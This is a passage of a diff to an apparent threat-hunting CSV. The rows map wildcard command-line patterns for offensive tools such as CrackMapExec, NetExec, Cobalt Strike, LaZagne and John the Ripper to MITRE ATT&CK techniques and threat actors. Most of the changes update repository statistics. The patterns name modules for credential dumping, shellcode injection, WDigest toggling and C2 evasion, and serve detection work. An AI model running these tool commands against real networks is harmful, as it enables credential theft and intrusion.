Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M spider_plus -o MAX_FILE_SIZE=100*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M teams_localdb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -M tokens*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M uac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -m run_command -c *.exe*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -M runasppl *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M scuffy -o SERVER=127.0.0.1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M scuffy*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M shadowcoerce *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M shadowcoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M shellcode_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M slinky","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M slinky -o SERVER=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M spider_plus *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M spider_plus -o MAX_FILE_SIZE=100*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M teams_localdb *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M tokens*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M uac","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* -m venv csexec *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -M wdigest -o ACTION=disable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M wdigest -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* -M web_delivery*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* -M zerologon *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -M wdigest -o ACTION=disable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M wdigest -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -M web_delivery*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -M zerologon *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* m3-gen.py *","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"* malleable.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* malleable.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* malleable-c2-randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"* mask?a?a?a?a?*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --mask=?1?1?1* --min-len*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --max-attack-time*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"* mask?a?a?a?a?*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --mask=?1?1?1* --min-len*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"* --max-attack-time*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "* maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -mdns y -mdnsunicast n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"* -mDNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -mDNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* memorpy *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* memorpy *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "* memreader.c *","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 